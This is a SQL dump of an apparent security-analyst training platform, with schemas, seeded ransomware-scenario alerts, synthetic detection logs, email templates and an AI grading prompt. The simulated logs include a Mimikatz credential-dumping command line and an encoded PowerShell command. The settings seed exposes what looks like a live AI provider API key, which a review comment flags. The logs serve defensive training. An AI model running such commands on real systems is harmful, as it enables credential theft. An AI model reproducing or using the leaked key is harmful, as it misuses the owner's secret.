(963, 194, 1609, 4, 'Credential Dumping Techniques', '### Credential Dumping Detected\n\nCredential dumping activity has been identified, signaling lateral movement within the network. **Key Observations:**\n- **Tools Used:** Common tools such as Mimikatz have been employed.\n- **Targeted Accounts:** Focus on administrative accounts with elevated privileges.\n- **Network Impact:** Increased risk of further infiltration and spread of ransomware.\n\nThis activity highlights the critical need to safeguard user credentials and monitor network traffic for anomalies.', '2026-03-15 19:18:01'),
(964, 194, 1610, 5, 'Data Exfiltration Dynamics', '### Data Transfer to External Server\n\nData exfiltration has been detected, with sensitive information being transferred to an external server. **Critical Insights:**\n- **Exfiltration Method:** Encrypted transfers to avoid detection.\n- **Data Types:** Includes sensitive operational and personnel data.\n- **Potential Consequences:** Increased risk of data breaches and potential follow-up attacks.\n\nUnderstanding these dynamics provides context for the ransomware\'s impact, setting the stage for the extortion attempts in the NRA attack.', '2026-03-15 19:18:01'),
(965, 194, 1611, 6, NULL, NULL, '2026-03-15 19:18:01'),
(966, 195, 1612, 1, 'Initial Phishing Tactics and Strategies', '## Initial Phishing Tactics and Strategies\n\n### Overview\nThe initial alert involves a suspicious phishing email detected within Capcom\'s network. This phishing attempt is believed to be the initial vector for the Ragnar Locker ransomware attack.\n\n### Analysis\n- **Email Source:** The email originated from a compromised external address, masquerading as a trusted partner.\n- **Email Content:** The email contained a malicious attachment disguised as a legitimate business document.\n- **Delivery Method:** Spear-phishing tactics aimed at specific individuals within the organization, particularly those with administrative access.\n\n### Recommendations\n- **Training:** Immediate cybersecurity awareness training for employees focusing on phishing detection.\n- **Monitoring:** Enhanced email filtering and monitoring for suspicious activities.\n\n### Next Steps\nPrepare for the possibility of malicious scripts executing within the network, indicating a move to the next stage of the attack.', '2026-03-15 19:18:11'),
(967, 195, 1613, 2, 'PowerShell Execution and Compromise Progression', '## PowerShell Execution and Compromise Progression\n\n### Current Status\nFollowing the phishing email detection, unusual PowerShell execution has been observed, signaling the transition from initial access to execution.\n\n### Detailed Findings\n- **Execution Method:** PowerShell scripts executed remotely, potentially using the credentials obtained from the phishing attack.\n- **Purpose:** The scripts are designed to establish persistence and facilitate lateral movement within the network.\n- **Indicators of Compromise:** New registry keys, suspicious network traffic, and unauthorized script execution.\n\n### Mitigation Measures\n- **Script Blocking:** Implement strict policies to block or log PowerShell script execution.\n- **Credential Management:** Immediate review and rotation of compromised credentials.\n\n### Next Steps\nThe possibility of persistence mechanisms being established should be investigated, as it may lead to the creation of unauthorized user accounts.', '2026-03-15 19:18:11'),
(968, 195, 1614, 3, 'Persistence and Unauthorized Account Creation', '## Persistence and Unauthorized Account Creation\n\n### Situation Update\nThe detection of new user account creation indicates the attacker\'s efforts to maintain persistent access within Capcom\'s network.\n\n### Key Observations\n- **Account Characteristics:** Newly created accounts with elevated privileges, not aligning with standard operating procedures.\n- **Activity Logs:** Unexplained access attempts and logins from these accounts.\n- **Potential Targets:** Critical systems and databases, including game data servers.\n\n### Defensive Actions\n- **Account Audit:** Conduct a thorough audit of all user accounts and permissions.\n- **Access Restrictions:** Temporarily restrict access to sensitive systems until the integrity of user accounts is verified.\n\n### Next Steps\nThe focus should now shift to monitoring for data exfiltration activities, as attackers may attempt to transfer large volumes of data out of the network.', '2026-03-15 19:18:11'),
(969, 195, 1615, 4, NULL, NULL, '2026-03-15 19:18:11');

-- --------------------------------------------------------

--
-- Table structure for table `organizations`
--

-- Tenant record for the team/business/enterprise plans. `owner_id` is the user
-- who owns the tenant; `license_seats`/`used_seats` carry the seat quota and
-- the two `stripe_*` columns tie the tenant to billing. `settings` follows the
-- same utf8mb4_bin LONGTEXT pattern as `simulated_logs.raw_data` but has no
-- json_valid CHECK, so any text is accepted there. This statement declares no
-- PRIMARY KEY or index and no ENGINE/CHARSET clause (server defaults apply).
CREATE TABLE `organizations` (
  `id`                     INT(11)                              NOT NULL,
  `name`                   VARCHAR(255)                         NOT NULL,
  `slug`                   VARCHAR(100)                         NOT NULL,
  `owner_id`               INT(11)                              NOT NULL,
  `logo_url`               VARCHAR(500)                         DEFAULT NULL,
  `stripe_customer_id`     VARCHAR(100)                         DEFAULT NULL,
  `stripe_subscription_id` VARCHAR(100)                         DEFAULT NULL,
  `license_seats`          INT(11)                              DEFAULT 5,
  `used_seats`             INT(11)                              DEFAULT 1,
  `plan_type`              ENUM('team','business','enterprise') DEFAULT 'team',
  `settings`               LONGTEXT CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `is_active`              TINYINT(1)                           DEFAULT 1,
  `created_at`             TIMESTAMP                            NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updated_at`             TIMESTAMP                            NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ;

-- --------------------------------------------------------

--
-- Table structure for table `organization_invites`
--

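-- Pending e-mail invitations into an organization. `token` is the bearer value
-- the invitee presents, `expires_at` bounds its validity and `accepted_at`
-- records redemption (NULL while pending).
-- Fix: `expires_at` previously carried ON UPDATE current_timestamp(), so any
-- UPDATE to the row (for example setting `accepted_at` or changing `role`)
-- silently moved the expiry to "now". An expiry must change only when set
-- explicitly, so the ON UPDATE clause is dropped. The explicit DEFAULT is kept
-- on purpose: without it MariaDB (explicit_defaults_for_timestamp=OFF on this
-- 10.6 server) would re-apply its implicit ON UPDATE behaviour to the first
-- NOT NULL TIMESTAMP column. An invite inserted without an explicit expiry is
-- therefore born expired, which fails closed.
-- Left unchanged here: the table is MyISAM/latin1 while `password_resets` and
-- `simulated_logs` are InnoDB/utf8mb4 (no transactions or FK enforcement from
-- the engine, and latin1 cannot hold non-Latin addresses), and no UNIQUE key
-- on `token` is declared in this statement.
CREATE TABLE `organization_invites` (
  `id` int(11) NOT NULL,
  `organization_id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` varchar(100) NOT NULL,
  `role` enum('admin','member') DEFAULT 'member',
  `invited_by` int(11) NOT NULL,
  `expires_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `accepted_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;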

-- --------------------------------------------------------

--
-- Table structure for table `organization_members`
--

-- Membership rows joining users to organizations. `role` adds 'owner' on top
-- of the admin/member pair used by `organization_invites`; `invited_by` is
-- nullable here, unlike its NOT NULL counterpart on invites. MyISAM/latin1
-- like the other membership tables, so the engine provides neither
-- transactions nor foreign-key enforcement. No keys are declared in this
-- statement.
CREATE TABLE `organization_members` (
  `id`              INT(11)                        NOT NULL,
  `organization_id` INT(11)                        NOT NULL,
  `user_id`         INT(11)                        NOT NULL,
  `role`            ENUM('owner','admin','member') DEFAULT 'member',
  `joined_at`       TIMESTAMP                      NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `invited_by`      INT(11)                        DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `password_resets`
--

-- One row per password-reset request, keyed by the requesting `email`.
-- `token` is the bearer value mailed to the user. Only `created_at` (a
-- DATETIME, not a TIMESTAMP) records timing: there is no expires_at or used_at
-- column, so token lifetime and single-use enforcement, if any, live in
-- application code. NOTE(review): confirm that the application stores a hash
-- of the reset token rather than the raw value and bounds its age from
-- `created_at`; nothing in this schema enforces either.
CREATE TABLE `password_resets` (
  `id`         INT(11)      NOT NULL,
  `email`      VARCHAR(255) NOT NULL,
  `token`      VARCHAR(255) NOT NULL,
  `created_at` DATETIME     DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `simulated_logs`
--

-- Synthetic log events served to the platform's log-search exercises.
-- `raw_data` holds the full event as JSON and is guarded by a json_valid
-- CHECK; the extracted columns (`source_ip`, `dest_ip`, `event_type`,
-- `action`) are a denormalised subset for filtering. `index_name` names the
-- log source bucket (the seed rows use firewall_traffic, windows_events,
-- sysmon_events, aws_cloudtrail and crowdstrike_edr; default 'main').
-- `alert_id` presumably links an event to an `alerts` row — all seed rows
-- leave it NULL. VARCHAR(45) covers the textual form of an IPv4-mapped IPv6
-- address. No keys are declared in this statement.
CREATE TABLE `simulated_logs` (
  `id`         INT(11)      NOT NULL,
  `timestamp`  DATETIME     NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `source_ip`  VARCHAR(45)  DEFAULT NULL,
  `dest_ip`    VARCHAR(45)  DEFAULT NULL,
  `event_type` VARCHAR(100) DEFAULT NULL,
  `action`     VARCHAR(50)  DEFAULT NULL,
  `raw_data`   LONGTEXT CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL
               CHECK (json_valid(`raw_data`)),
  `index_name` VARCHAR(50)  DEFAULT 'main',
  `alert_id`   INT(11)      DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `simulated_logs`
--

-- Seed events for the log-search exercises. `raw_data` is a JSON object whose
-- shape depends on `index_name` (firewall_traffic, windows_events,
-- sysmon_events, aws_cloudtrail, crowdstrike_edr); the table's json_valid
-- CHECK rejects malformed rows. Every `alert_id` in this seed is NULL.
-- Quotes and backslashes inside the JSON carry dump-level escaping: \" becomes
-- " and \\ becomes \ once MariaDB parses the literal. Row 11's CommandLine
-- therefore decodes to a value with embedded double quotes, and rows 15-16's
-- file_path keeps doubled backslashes even after JSON decoding
-- (8 written -> 4 stored -> 2 in the parsed value), which looks over-escaped —
-- confirm against the loader before relying on exact path matches.
-- Addresses mix RFC 1918 space, documentation ranges (203.0.113.x,
-- 198.51.100.x) and public IPs; the hash fields are short placeholders.
INSERT INTO `simulated_logs` (`id`, `timestamp`, `source_ip`, `dest_ip`, `event_type`, `action`, `raw_data`, `index_name`, `alert_id`) VALUES
(1, '2026-03-01 08:15:23', '10.0.0.45', '185.220.101.34', 'connection', 'blocked', '{\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"185.220.101.34\",\"port\":443,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":256,\"rule\":\"TOR_EXIT_NODE_BLOCK\"}', 'firewall_traffic', NULL),
(2, '2026-03-01 08:16:45', '10.0.0.22', '192.168.1.100', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.22\",\"dst_ip\":\"192.168.1.100\",\"port\":8080,\"action\":\"allowed\",\"bytes_in\":4096,\"bytes_out\":1024,\"rule\":\"INTERNAL_ALLOW\"}', 'firewall_traffic', NULL),
(3, '2026-03-01 09:22:11', '203.0.113.50', '10.0.0.12', 'connection', 'blocked', '{\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.12\",\"port\":22,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"SSH_BRUTE_FORCE\"}', 'firewall_traffic', NULL),
(4, '2026-03-02 14:05:33', '10.0.0.88', '104.26.10.5', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.88\",\"dst_ip\":\"104.26.10.5\",\"port\":443,\"action\":\"allowed\",\"bytes_in\":52000,\"bytes_out\":3200,\"rule\":\"HTTPS_ALLOW\"}', 'firewall_traffic', NULL),
(5, '2026-03-01 10:30:00', '10.0.0.15', NULL, 'logon', 'success', '{\"EventID\":4624,\"User\":\"jsmith\",\"LogonType\":10,\"Status\":\"Success\",\"Workstation\":\"WS-ADMIN-01\",\"SourceIP\":\"10.0.0.15\"}', 'windows_events', NULL),
(6, '2026-03-01 10:32:15', '10.0.0.15', NULL, 'logon', 'failed', '{\"EventID\":4625,\"User\":\"admin\",\"LogonType\":3,\"Status\":\"Bad Password\",\"Workstation\":\"WS-ADMIN-01\",\"SourceIP\":\"10.0.0.15\"}', 'windows_events', NULL),
(7, '2026-03-01 11:45:22', '10.0.0.33', NULL, 'logon', 'failed', '{\"EventID\":4625,\"User\":\"administrator\",\"LogonType\":10,\"Status\":\"Account Locked\",\"Workstation\":\"SRV-DC-01\",\"SourceIP\":\"10.0.0.33\"}', 'windows_events', NULL),
(8, '2026-03-02 06:00:01', '10.0.0.5', NULL, 'service', 'success', '{\"EventID\":7045,\"User\":\"SYSTEM\",\"ServiceName\":\"WindowsUpdate\",\"Status\":\"Running\"}', 'windows_events', NULL),
(9, '2026-03-01 12:15:44', '10.0.0.22', NULL, 'process_create', 'logged', '{\"EventID\":1,\"User\":\"jdoe\",\"ProcessName\":\"powershell.exe\",\"CommandLine\":\"powershell -enc SQBFAHgA\",\"ParentProcessName\":\"cmd.exe\",\"Hashes\":\"SHA256=a1b2c3d4e5f6\"}', 'sysmon_events', NULL),
(10, '2026-03-01 12:20:33', '10.0.0.22', '185.123.231.45', 'network_connect', 'logged', '{\"EventID\":3,\"User\":\"jdoe\",\"ProcessName\":\"powershell.exe\",\"DestinationIp\":\"185.123.231.45\",\"DestinationPort\":4444,\"Protocol\":\"TCP\"}', 'sysmon_events', NULL),
(11, '2026-03-02 09:10:55', '10.0.0.40', NULL, 'process_create', 'logged', '{\"EventID\":1,\"User\":\"admin\",\"ProcessName\":\"mimikatz.exe\",\"CommandLine\":\"mimikatz.exe \\\"sekurlsa::logonpasswords\\\"\",\"ParentProcessName\":\"explorer.exe\",\"Hashes\":\"SHA256=deadbeef1234\"}', 'sysmon_events', NULL),
(12, '2026-03-01 15:00:12', '198.51.100.23', NULL, 'ConsoleLogin', 'success', '{\"userIdentity\":{\"userName\":\"admin-user\"},\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"userAgent\":\"Mozilla/5.0\",\"sourceIPAddress\":\"198.51.100.23\"}', 'aws_cloudtrail', NULL),
(13, '2026-03-01 15:05:33', '198.51.100.23', NULL, 'CreateUser', 'success', '{\"userIdentity\":{\"userName\":\"admin-user\"},\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateUser\",\"userAgent\":\"aws-cli/2.0\",\"sourceIPAddress\":\"198.51.100.23\"}', 'aws_cloudtrail', NULL),
(14, '2026-03-02 03:22:11', '45.33.32.156', NULL, 'GetSecretValue', 'success', '{\"userIdentity\":{\"userName\":\"lambda-role\"},\"eventSource\":\"secretsmanager.amazonaws.com\",\"eventName\":\"GetSecretValue\",\"userAgent\":\"aws-sdk-python\",\"sourceIPAddress\":\"45.33.32.156\"}', 'aws_cloudtrail', NULL),
(15, '2026-03-01 16:45:00', '10.0.0.55', NULL, 'detection', 'quarantined', '{\"alert_name\":\"Suspicious PowerShell Execution\",\"severity\":\"High\",\"sensor_id\":\"SENSOR-WS22\",\"tactic\":\"Execution\",\"technique\":\"T1059.001\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\update.ps1\",\"sha256\":\"abc123def456\",\"action_taken\":\"quarantined\"}', 'crowdstrike_edr', NULL),
(16, '2026-03-02 11:30:22', '10.0.0.12', NULL, 'detection', 'blocked', '{\"alert_name\":\"Credential Dumping via LSASS\",\"severity\":\"Critical\",\"sensor_id\":\"SENSOR-DC01\",\"tactic\":\"Credential Access\",\"technique\":\"T1003.001\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dump.dll\",\"sha256\":\"deadbeef5678\",\"action_taken\":\"blocked\"}', 'crowdstrike_edr', NULL),
(17, '2026-03-03 07:12:00', '192.168.1.102', '8.8.8.8', 'dns', 'allowed', '{\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"8.8.8.8\",\"port\":53,\"action\":\"allowed\",\"bytes_in\":128,\"bytes_out\":64,\"rule\":\"DNS_ALLOW\"}', 'firewall_traffic', NULL),
(18, '2026-03-03 08:45:33', '192.168.1.55', '10.0.0.1', 'connection', 'denied', '{\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"10.0.0.1\",\"port\":3389,\"action\":\"denied\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"RDP_BLOCK_EXTERNAL\"}', 'firewall_traffic', NULL),
(19, '2026-03-03 12:00:00', '10.0.0.100', '151.101.1.140', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.100\",\"dst_ip\":\"151.101.1.140\",\"port\":443,\"action\":\"allowed\",\"bytes_in\":98000,\"bytes_out\":5400,\"rule\":\"HTTPS_ALLOW\"}', 'firewall_traffic', NULL),
(20, '2026-03-04 02:33:11', '45.155.205.233', '10.0.0.5', 'scan', 'blocked', '{\"src_ip\":\"45.155.205.233\",\"dst_ip\":\"10.0.0.5\",\"port\":445,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"SMB_EXTERNAL_BLOCK\"}', 'firewall_traffic', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `student_domains`
--

-- E-mail domains recognised as student domains (the seed below holds one,
-- added by user 1). Presumably consulted at registration to grant student
-- status — confirm in the application. `added_by` is nullable. MyISAM/latin1,
-- so the engine enforces no foreign key to the adding user. No keys are
-- declared in this statement.
CREATE TABLE `student_domains` (
  `id`         INT(11)      NOT NULL,
  `domain`     VARCHAR(255) NOT NULL,
  `added_by`   INT(11)      DEFAULT NULL,
  `created_at` TIMESTAMP    NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `student_domains`
--

-- Seed: a single recognised institution domain, added by user id 1.
INSERT INTO `student_domains`
    (`id`, `domain`, `added_by`, `created_at`)
VALUES
    (1, 'georgebrown.ca', 1, '2026-01-27 22:21:57');

-- --------------------------------------------------------

--
-- Table structure for table `system_settings`
--

-- Application key/value configuration. `key` is a reserved word, hence the
-- backticks wherever it is referenced. `value` is free text (utf8mb4_bin, no
-- json_valid CHECK); the seed rows store JSON-encoded scalars such as "true"
-- and "12", but `ai_auto_gen_enabled` stores a bare false, so consumers must
-- accept both forms. `category` groups keys (email_template, ai_integration,
-- ...). NOTE(review): secrets such as provider API keys are kept in clear in
-- `value`, so anyone who can read this table — or a dump of it — holds them;
-- prefer an external secret store, or at least exclude such rows from exported
-- seeds. No PRIMARY KEY on `key` is declared in this statement.
CREATE TABLE `system_settings` (
  `key`        VARCHAR(255) NOT NULL,
  `value`      LONGTEXT CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `category`   VARCHAR(50)  DEFAULT NULL,
  `updated_at` DATETIME     DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `system_settings`
-- NOTE(review): this seed includes an `ai_api_key` row whose `value` looks like
-- a live provider API key. A key that has been written into a dump must be
-- treated as compromised: rotate it, and replace the value with a placeholder
-- before the dump is stored or shared again. Settings that are secrets should
-- not travel in seed data.
--

INSERT INTO `system_settings` (`key`, `value`, `category`, `updated_at`) VALUES
('account_deleted_body', '\"<h1>Account Deleted</h1><p>Hi {{name}},</p><p>Your account has been successfully deleted from InfoSec Labs. We are sorry to see you go.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('account_deleted_subject', '\"Account Deleted\"', 'email_template', '2026-03-13 05:11:26'),
('account_locked_body', '\"<h1>Account Locked</h1><p>Hi {{name}},</p><p>Your account has been locked due to multiple failed login attempts. Please contact support or try again later.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('account_locked_subject', '\"Your Account has been Locked\"', 'email_template', '2026-03-13 05:11:26'),
('ai_admin_approval', '\"false\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_alert_count', '\"2\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_alert_frequency', '\"12hours\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_api_key', '\"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\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_auto_gen_enabled', 'false', 'ai_integration', '2026-03-13 05:11:26'),
('ai_distribution_hours', '\"12\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_evaluation_enabled', '\"true\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_prompt', '\"You are a Professional SOC Analyst and Mentor at a high-security Security Operations Center.\\nYour task is to review and grade a junior analyst\'s investigation report for a security alert.\\n\\n### ALERT CONTEXT\\nTitle: {{title}}\\nSeverity: {{severity}}\\nDescription: {{details}}\\nIs Real World Example: {{example}}\\n\\n### ANALYST SUBMISSION\\nVerdict: {{verdict}}\\nAnalysis: {{analysis}}\\nSteps Taken: {{steps}}\\nConclusion: {{conclusion}}\\n\\n### EVALUATION CRITERIA\\n1. Verdict Accuracy (CRITICAL): Did the analyst correctly identify the true nature of the alert (True Positive vs False Positive)?\\n2. Analysis Depth: Did they interpret the raw logs correctly? Did they find the root cause?\\n3. Remediation: Were the steps taken (e.g., blocking IPs, isolating hosts, resetting passwords) appropriate for the severity?\\n4. Communication: Is the conclusion clear, professional, and actionable?\\n\\n### YOUR OUTPUT\\nYou must respond with valid JSON ONLY. Do not use Markdown formatting (like ```json).\\n\\n{\\n  \\\"grade\\\": <integer between 0 and 100>,\\n  \\\"feedback\\\": \\\"<Constructive, professional feedback addressed to the analyst. improved analysis tips.>\\\",\\n  \\\"ai_summary\\\": {\\n    \\\"verdict\\\": \\\"<The Correct Verdict>\\\",\\n    \\\"analysis\\\": \\\"<Expert technical analysis of what actually occurred in this alert>\\\",\\n    \\\"steps\\\": \\\"<The ideal remediation steps that should have been taken>\\\",\\n    \\\"conclusion\\\": \\\"<A concise executive summary suitable for management>\\\"\\n  }\\n}\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_provider', '\"openai\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_strategy', '\"random\"', 'ai_integration', '2026-03-13 05:11:26'),
('alert_assigned_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: 
rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">New Incident Assigned</h1> <p>Hello <strong>{{name}}</strong>,</p> <p>A new security incident has been flagged and assigned to you for immediate analysis.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; uppercase;\\\">Incident Details</p> <h3 style=\\\"margin:5px 0; color:#fff; font-size:18px;\\\">{{title}}</h3> <p style=\\\"margin:0; color:#b026ff; font-weight:bold;\\\">Status: Pending Investigation</p> </div> <p>Review logs and submit your verdict.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">Start Investigation</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('alert_assigned_subject', '\"New Mission: {{title}}\"', 'email_template', '2026-03-16 06:05:29'),
('articles', '\"[]\"', 'newsletter', '2026-03-13 05:11:26'),
('award_gold_body', '\"<h1>🏆 Gold Award Earned!</h1><p>Hi {{name}},</p><p>Congratulations on your outstanding performance! You have been awarded the Gold Analyst Badge.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('award_gold_subject', '\"Congratulations! You earned a Gold Award\"', 'email_template', '2026-03-13 05:11:26'),
('award_won_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); 
padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Achievement Unlocked</h1> <div style=\\\"text-align: center; margin-bottom: 20px;\\\"> <div style=\\\"font-size: 64px;\\\">🏆</div> </div> <p style=\\\"text-align: center; font-size: 18px;\\\">Congratulations, <strong>{{name}}</strong>!</p> <p style=\\\"text-align: center;\\\">You have earned the <strong>{{awardType}} Tier Analyst</strong> award.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #f59e0b; text-align: center;\\\"> <p style=\\\"color: #fff;\\\">This badge has been added to your profile as a testament to your elite status.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/profile\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #f59e0b 0%, #d97706 100%); box-shadow: 0 4px 15px rgba(245, 158, 11, 0.4);\\\">View Profile</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('award_won_subject', '\"Achievement Unlocked: {{awardType}} Award\"', 'email_template', '2026-03-16 06:05:29'),
('banner_enabled', 'true', 'general', '2026-03-13 05:11:26'),
('banner_message', '\"✨ Don’t Miss Out! Unlock 60% Savings Today Only ✨\"', 'general', '2026-03-13 05:11:26'),
('blog_automation_is_running', 'false', 'blog_automation', '2026-03-15 06:01:16'),
('blog_automation_status', '{\"status\":\"idle\",\"message\":\"Successfully created draft: Starbucks discloses data breach affecting hundreds of employees\",\"lastRun\":\"2026-03-15T06:01:01.173Z\",\"lastRunStatus\":\"success\"}', 'blog_automation', '2026-03-15 09:01:01'),
('blog_auto_pilot_enabled', 'true', 'blog_automation', '2026-03-15 06:01:08'),
('blog_lock_cisa-flags-actively-exploited-n8n-rce-bug-as-24-700-instances-remain-exposed', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_google-fixes-two-chrome-zero-days-exploited-in-the-wild-affecting-skia-and-v8', 'locked', 'blog_locks', '2026-03-14 09:00:04'),
('blog_lock_google-fixes-two-new-chrome-zero-days-exploited-in-attacks', 'locked', 'blog_locks', '2026-03-14 09:00:07'),
('blog_lock_interpol-dismantles-45-000-malicious-ips-arrests-94-in-global-cybercrime', 'locked', 'blog_locks', '2026-03-15 09:00:03'),
('blog_lock_microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-patch-tuesday-march-2026-edition', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
